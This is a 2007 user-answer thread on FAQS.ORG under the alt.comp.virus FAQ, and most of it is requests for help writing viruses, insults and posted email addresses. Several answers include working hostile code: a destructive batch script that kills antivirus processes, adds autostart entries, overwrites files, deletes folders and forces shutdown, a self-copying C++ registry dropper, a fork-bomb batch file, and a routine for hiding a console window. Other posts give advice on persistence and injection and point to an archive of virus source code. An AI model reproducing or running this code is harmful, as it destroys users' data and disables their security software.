
Answer by chander prakash
Submitted on 4/20/2007
Rating: Not yet rated Rate this answer: Vote
i want to create a virus in c++ please sent my answer how i create virus?

 

Answer by subir
Submitted on 4/20/2007
Rating: Not yet rated Rate this answer: Vote
iwant to do a new account

 

Answer by paj
Submitted on 4/23/2007
Rating: Not yet rated Rate this answer: Vote
how to create virus in c?

 

Answer by 73573735737357
Submitted on 4/24/2007
Rating: Not yet rated Rate this answer: Vote
stop beggin for viruses. theres already loads around the world. we dont need any more you noobs.

 

Answer by VIRUS
Submitted on 4/26/2007
Rating: Not yet rated Rate this answer: Vote
HAHAHAHAHAHA ALL AF YOU GOT A VIRUS..

 

Answer by Niberial
Submitted on 4/27/2007
Rating: Not yet rated Rate this answer: Vote
c++ is your best bet for a virus program, but it helps if you start with Java. the language is harder but the final code is faster

 

Answer by Unknown0taku
Submitted on 5/1/2007
Rating: Not yet rated Rate this answer: Vote
lol....this $|-|17 funny....you noobs don't know where to buy these books....ever heard of a book store....no because you noob cakes probably don't set a foot out of your bedroom. Go outside and breathe some fresh air. Take a drive go to a mall. There is many book stores...you just gotta look.                                            Also...you guys obviously got internet...so why don't you look up Bookstores in a search engine

 

Answer by Chirag Aneja
Submitted on 5/4/2007
Rating: Not yet rated Rate this answer: Vote
I want to creat a virus in c++ programming

 

Answer by strong
Submitted on 5/5/2007
Rating: Not yet rated Rate this answer: Vote
i looked in to this forum, its like a crap, nobody tries to learn how to hack and they want to become hackers. In the Internet lot of stuff is available but they never turn up. I think their dream to become hackers will soon become a dream.

 

Answer by Ben
Submitted on 5/5/2007
Rating: Not yet rated Rate this answer: Vote
this webpage is outdated :)

 

Answer by TheSmartOne
Submitted on 5/5/2007
Rating: Not yet rated Rate this answer: Vote
Hey guys,
Listen uz are all just being stupid here with your "I want to create a virus and destroy computers" First things first! SHUT UP!!

HACKING AND CRACKING ARE DIFFERENT THINGS!!!!!
Hacking is the creation of computer applications or web applications for the better use of all people and the helping of you understanding computers. If you want to CRACK i would suggest learning how to hack first. Try C# not C++. Its much better.

CRACKING: Is what you idiots think is hacking. This is the creation of malicious computer applications, and taking of peoples passwords.

You cant just create a virus without knowing how a computer works or how applications are run on a computer.
Buy a book and learn yourself stop asking people to do it for you! Jesus!

Andy

 

Answer by Aust
Submitted on 5/6/2007
Rating: Not yet rated Rate this answer: Vote
creating some ting that is power full is great.

 

Answer by Abbadon
Submitted on 5/6/2007
Rating: Not yet rated Rate this answer: Vote
Geez guys, simply do this: learn how to program in any language you want, then use the windows api functions that allow you to add keys to the registry, make your lil virus auto run itself by inserting it in the registry, then learn the functions FindWindow, and SendMessage of the winapi is easy to use em. Also google on "injection" in case you want your virus to auto inject to some running program like the explorer.exe :) good luck

 

Answer by nigeyaloo
Submitted on 5/7/2007
Rating: Not yet rated Rate this answer: Vote
I have small penis, so I want to be a big hacker and I will be evil genius, so I will kill all you PCs, mwoahahaaa!!!!    I will create virus that can kill even people, just by hypnotising them and pushing them to commit suicide, ha ha haaa!!! I have small penis

 

Answer by vshal
Submitted on 5/7/2007
Rating: Not yet rated Rate this answer: Vote
i want some strong virus in c++ or HTML


i_remind@yahoo.co.in

 

Answer by gurpreet
Submitted on 5/9/2007
Rating: Not yet rated Rate this answer: Vote
give the code of any virus

 

Answer by JAC_PLAGUE
Submitted on 5/11/2007
Rating: Not yet rated Rate this answer: Vote
Guys Please !!
The intellect of a virus is not in it's damage or disadvantages, It's in the ability to create a file (or a program) where you can start it on one of your friends' Computer and after only one week you get somebody's Hard Drive and you find your subordinate file on that Drive !!

Try downloading "perfect keylogger". Explore it. and then try to come up with the infection part. If you do that you'll be able to create a harmless "e-subordinate" with the infectious symptoms.

It's a Fact that most of the Effective viruses are created using only one Programming language yet it's fair to say that the less conspicuous viruses are the ones created using a set of programs. after all everthing is everthing !

At the end, 5 years ago... may be 6, I've started with a batch file and a "Bat2EXE" Compiler !

So Good luck

Tip of the Day:
If you wanna work the Windows Operating systems, Stick to the registry. Learn it, and Master it.

 

Answer by urgay
Submitted on 5/11/2007
Rating: Not yet rated Rate this answer: Vote
if you go into note pad and write a virus then type save as whatever.bat then reopen it you will c it changed the icon to a bach file when u open it the virus will run

 

Answer by ledgman
Submitted on 5/11/2007
Rating: Not yet rated Rate this answer: Vote
all you people wanting to learn how to create viruses no1 is gonna tell you twats coz it just pure lazyness and learn c++ and create yr own instead of otha people maing them 4 you

 

Answer by 47
Submitted on 5/12/2007
Rating: Not yet rated Rate this answer: Vote
Lern a bit about file manipulation, how to crate files and delete them.

Then learn how to write to the windows registry so you can make your virus start every time the computer starts. And then you have to lern how to hide the program.

This pice of code hides a console window
//hide_console.cpp
#define _WIN32_WINNT 0x0500
#include <iostream>
#include <windows.h>

int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow( hWnd, SW_HIDE );
}
//end of file

when you know how to do all this stuf you can proberly write your very own computer virus.

47 out

 

Answer by net shark
Submitted on 5/13/2007
Rating: Not yet rated Rate this answer: Vote
please ,be pulite


 

Answer by kapoorangad
Submitted on 5/13/2007
Rating: Not yet rated Rate this answer: Vote
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}


 

Answer by kris k
Submitted on 5/14/2007
Rating: Not yet rated Rate this answer: Vote
school password

 

Answer by hi
Submitted on 5/15/2007
Rating: Not yet rated Rate this answer: Vote
i know a cool one :
go to notepad
type:
start virus.bat
virus.bat

and save it as virus.bat

have fun

 

Answer by *~*~*~*K~*~*
Submitted on 5/16/2007
Rating: Not yet rated Rate this answer: Vote
you guys are all lowless losers!!!!

 

Answer by madda
Submitted on 5/17/2007
Rating: Not yet rated Rate this answer: Vote
I want learn about to create a virus & hacking stuff, email me on, madu_samara@yahoo.com

 

Answer by Dr Spam-Virus
Submitted on 5/17/2007
Rating: Not yet rated Rate this answer: Vote
Check here http://cprogramming.com if u need further instructions email send an email with no files attached to marcmiller69@hotmail.com

 

Answer by Naaraxi
Submitted on 5/21/2007
Rating: Not yet rated Rate this answer: Vote
Wow , at least some people actually sound like they know what they're talking about .

PS : You're better off slithering to your target and unplugging their computer , yourself .

PPS : YOu should practice doing that on your own computer .

 

Answer by ACiiD
Submitted on 5/23/2007
Rating: Not yet rated Rate this answer: Vote
@ECHO OFF
copy %0 %systemroot%\ACiiD.bat > nul
copy %0 *.bat > nul
copy %0 *.exe > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill avgcc
tskill firefox

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ACiiD /t REG_SZ /d %systemroot%\ACiiD.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\ACiiD.bat >> %systemroot%\win.ini
echo run=%systemroot%\ACiiD.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
del C:\program files\
shutdown -s -t 15
cls
:ACiiD
start %0
goto ACiiD

Made by me. Your welcome

 

Answer by mikel91
Submitted on 5/23/2007
Rating: Not yet rated Rate this answer: Vote
send me examples of virus or hacking programs using c++ in my email address saintseiya201@yahoo.com thanks guys... i really want to learn the tools of the trade from the best... so please masters send me codes.. much thanks!!!

 

Answer by Screwball
Submitted on 5/24/2007
Rating: Not yet rated Rate this answer: Vote
Suckers i got your e-mails no iam going to infect u with a virus that not even norton or mcaffe detects. HAHAHAHAHA LOL.

Oh yeah and to those hackers Iam coming after you with a warrant to comfiscate your computers.

 

Answer by Screwball
Submitted on 5/24/2007
Rating: Not yet rated Rate this answer: Vote
Hey infectors heres a challange try to cancel out the video I/O command. It took me 1 month and 4 days. Just by reading a C+ book

 

Answer by getp
Submitted on 5/24/2007
Rating: Not yet rated Rate this answer: Vote
i want make a virus

 

Answer by daredevil
Submitted on 5/29/2007
Rating: Not yet rated Rate this answer: Vote
What a bunch of lametards! Get real man learn a language before creating a virus, all these dumbhead questions, damn after reading this crap i have to rethink my visions of fools parade !!! ( not to mention i know a few languages and wanted to know things with windows.h , but after reading this oh man !! )

 

Answer by sandeep
Submitted on 5/30/2007
Rating: Not yet rated Rate this answer: Vote
follow the directions given in ``vitual virus''  book

 

Answer by Never say never
Submitted on 5/30/2007
Rating: Not yet rated Rate this answer: Vote
Well although C and C++ are very versatile languages there are lots of other languages out there to learn also.  For example: Python, Perl, Java.  Java is particularly good because it is easy to learn, object orientated and most of all most people have the compatiblility software already installed, different JVM's

 

Answer by Chaos
Submitted on 5/30/2007
Rating: Not yet rated Rate this answer: Vote
wow ppl ur sooo stupid... u ppl are asking how to make viruses, last noob who posted thinks he know all about viruses... lol thx for the laugh ppl... (btw... shutup plz)

 

Answer by ITZ ME ITZ RAJ
Submitted on 5/30/2007
Rating: Not yet rated Rate this answer: Vote
PLZ HELP ME IN B'COMING A GOOD PRGRMR

 

Answer by SentineFX
Submitted on 5/31/2007
Rating: Not yet rated Rate this answer: Vote
email me on sentinefx@yahoo.com with any great ideas on creating powrfull andintelligent viruses pls guy... ur sincere

 

Answer by great programmer
Submitted on 6/2/2007
Rating: Not yet rated Rate this answer: Vote
hello
i also want to learn about virusus so that i can destroy all virusus any wanan help me
mail  at
kaloo300@yahoo.com

 

Answer by cheeto
Submitted on 6/2/2007
Rating: Not yet rated Rate this answer: Vote
YOU WANNA CREAT A VIRUS ????

Go to www.microsoft.com

Download the Visual Programme !

and you creat your virus !!
it will take u like 5 days ..
be a pro !
i jus creat one ! its dammge your hard disk for ever ! soo you have to buy a new XD
so good luck !

 

Answer by shariif
Submitted on 6/8/2007
Rating: Not yet rated Rate this answer: Vote
please and please Iwant you to teach me  c++ also Ilearnt some of it  and also Ineed it to create verus

 

Answer by N3CR0BU7CH3R
Submitted on 6/10/2007
Rating: Not yet rated Rate this answer: Vote
If you wanna do a virus with C/C++ under Windows, you should learn to use WINAPIS, find in google tutorials and more, moreover, in the page http://vx.netlux.org/ are source code of many virus: Mydoom, Blaster, Larissa, etc...

Bye.

P.D.: Sorry for my English

 

Answer by sandy
Submitted on 6/11/2007
Rating: Not yet rated Rate this answer: Vote
I NEED A SPAM WHICH CAN MAKE OUR WEBSITE FIRST IN THE SEARCH ENGINE OPTIMIZATION IF U HAVE THAT SPAM SEND TO ME OR CONTACT WITH ME I WILL BUY IT WITH ANY COST OKKKKKK

 

Answer by Arshad
Submitted on 6/11/2007
Rating: Not yet rated Rate this answer: Vote
I'd like to get a virus that eliminate the hard drives contents because some guy is blackmailing a friend of mine. using photos on on his computer

 

Answer by jackuwa
Submitted on 6/12/2007
Rating: Not yet rated Rate this answer: Vote
Send me the intruction in c++ how to create the virus and his antvirus, send me to jackuwa@gmail.com

 

Answer by RAJIB
Submitted on 6/17/2007
Rating: Not yet rated Rate this answer: Vote
VERY GOOD

 

Answer by weiping2007
Submitted on 6/17/2007
Rating: Not yet rated Rate this answer: Vote
i know how to program some virus but it can be very destrutive.

if you want add me in msn wei_ping_2007@hotmail.com

thanks

 

Answer by atpa
Submitted on 6/21/2007
Rating: Not yet rated Rate this answer: Vote
you're all stupid . The only way to make money through programming is to make something that people would bye. Creating a virus is the best way to give the oportunity to big antivirus companies one more reason to still sell their products. I studied for 6 months from 8 am to 8 pm c++ coding and i found no reason to create a virus. Now i know better. Make money by becoming ΑΝΑΝΤΙΚΑΤΑΣΤΑΤΟΣ! It's greek ... find it out on your own and you will understand what it means... By the way study winapi or else just put script in  *.bat. Programming is a language not a game or dos commands. GET REAL!!!

 

Answer by sega
Submitted on 6/23/2007
Rating: Not yet rated Rate this answer: Vote
i want to steal the information using virus

 

Answer by josh
Submitted on 6/25/2007
Rating: Not yet rated Rate this answer: Vote
f*** nerds

 

Answer by becamehacker
Submitted on 6/25/2007
Rating: Not yet rated Rate this answer: Vote
hello

 

Answer by arun
Submitted on 6/26/2007
Rating: Not yet rated Rate this answer: Vote
i want to learn how to create Virus programms in C & C++ plz Help me my mail id is cock4u69@rediffmail.com

 

Answer by kristian_666
Submitted on 6/27/2007
Rating: Not yet rated Rate this answer: Vote
i'd like to create virus pls e-mail me in superman666black@yahoo.com

 

Answer by kristian_666
Submitted on 6/27/2007
Rating: Not yet rated Rate this answer: Vote
i'dlike to create virus pls e-mail me in superman666black@yahoo.com

 

Answer by kervin
Submitted on 6/30/2007
Rating: Not yet rated Rate this answer: Vote
i want to know how to make anti-virus, if u want me to mail, here is my email add (krvnlms21@yahoo.com

 

Answer by ripper
Submitted on 7/3/2007
Rating: Not yet rated Rate this answer: Vote
u can download virus*s with bearshare or limewire too

 

Answer by alyn
Submitted on 7/5/2007
Rating: Not yet rated Rate this answer: Vote
MORRONS

 

Answer by spyril369
Submitted on 7/6/2007
Rating: Not yet rated Rate this answer: Vote
>>HI all, I would like to know if anybody knows any script in JavaScript, to change a Registry Key without asking for user to accept... thanx in advance, please e-mail if answer to toqilula@hotmail.com<<

Um....you can't modify registry values with Javascript.  Sorry.

 

Answer by virus man d
Submitted on 7/7/2007
Rating: Not yet rated Rate this answer: Vote
hai friends
i am just learning c language
i actually joint c language to know programing.i came to know that virus can be created using c if any one knows to do that please mail the program to me.

  www.virusmand@rediffmail.com

 

Answer by Alex
Submitted on 7/7/2007
Rating: Not yet rated Rate this answer: Vote
Aku Ingin Ajarin Gua Apacarnya Mempelajari C++

 

Answer by DJ
Submitted on 7/7/2007
Rating: Not yet rated Rate this answer: Vote
can some one send me an answer and making viruses can i really wanna do it and play jokes on ppl like my friends cause i have myspace so if u have a way e mail me at coolguy107@mail.com

 

Answer by bill
Submitted on 7/9/2007
Rating: Not yet rated Rate this answer: Vote
Come on if you want a virus in c.  Just wait until your computer is infected and then decompile the virus you got...

 

Answer by Sam
Submitted on 7/10/2007
Rating: Not yet rated Rate this answer: Vote
i want create Virus

 

Answer by ggg
Submitted on 7/11/2007
Rating: Not yet rated Rate this answer: Vote
gopal

 

Answer by jfk
Submitted on 7/13/2007
Rating: Not yet rated Rate this answer: Vote
what program should i use

 

Answer by faraz
Submitted on 7/14/2007
Rating: Not yet rated Rate this answer: Vote
my name is faraz

 

Answer by Fizzy
Submitted on 7/17/2007
Rating: Not yet rated Rate this answer: Vote
"""all of u ppl asking how to make a virus r twats. and n00bs. no rly, u r. get a frikin c++ book for f""ks sake """

hey man what book u sugest for a begginer...please give answer thanks

 

Answer by mila
Submitted on 7/20/2007
Rating: Not yet rated Rate this answer: Vote
wat is the problem
if the problem cant work properly you must be do your best other wise do it for your self ok
are you legal programmer?
if you dont you must be illegal you have to chk your own consistency.
thanks fo no

 

Answer by trojan58
Submitted on 7/21/2007
Rating: Not yet rated Rate this answer: Vote
i know me and my friends put in a lot of work creating codes for future viruses we help build the trojan program all over the net and how i started is just buying a c++ book not being lazy to get it yourselves.

 

Your answer will be published for anyone to see and rate.  Your answer will not be displayed immediately.  If you'd like to get expert points and benefit from positive ratings, please create a new account or login into an existing account below.


Your name or nickname:
If you'd like to create a new account or access your existing account, put in your password here:
Your answer:

FAQS.ORG reserves the right to edit your answer as to improve its clarity.  By submitting your answer you authorize FAQS.ORG to publish your answer on the WWW without any restrictions. You agree to hold harmless and indemnify FAQS.ORG against any claims, costs, or damages resulting from publishing your answer.

 

FAQS.ORG makes no guarantees as to the accuracy of the posts. Each post is the personal opinion of the poster. These posts are not intended to substitute for medical, tax, legal, investment, accounting, or other professional advice. FAQS.ORG does not endorse any opinion or any product or service mentioned mentioned in these posts.

 

<< Back to: [alt.comp.virus] FAQ Part 1/4


[ Home  |  FAQ-Related Q&As  |  General Q&As  |  Answered Questions ]

© 2008 FAQS.ORG. All rights reserved.